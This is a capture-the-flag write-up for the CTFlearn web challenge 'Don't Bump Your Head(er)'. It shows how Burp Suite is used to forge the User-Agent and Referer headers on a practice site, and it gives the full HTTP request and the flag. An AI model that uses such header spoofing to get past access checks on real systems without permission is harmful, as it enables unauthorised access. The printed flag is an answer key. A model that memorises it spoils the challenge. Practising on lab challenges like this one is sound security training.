Don't Bump Your Head(er).md

Try to bypass my security measure on this site! http://165.227.106.113/header.php

Before we do anything else let's check the source code.

Sup3rS3cr3tAg3nt

Burpsuite

Let's open Burpsuite and turn on the Proxy.

Then we can visit the website again so that it shows up in the Proxy > HTTP History.

Let's send the HHTP request to the Repeater by Left click > Send to Repeater.

Now we have to change the User-Agent to Sup3rS3cr3tAg3nt.

The website expects us to visit from awesomesauce.com.

We can use the Referer HTTP header to help the server identify referring page.

HTTP Request

GET /header.php HTTP/1.1
Host: 165.227.106.113
User-Agent: Sup3rS3cr3tAg3nt
Referer: awesomesauce.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

We can now send the request and check the Response tab.

Flag

CTFlearn{did_this_m3ss_with_y0ur_h34d}

Burpsuite​

HTTP Request​

Flag​

Burpsuite

HTTP Request

Flag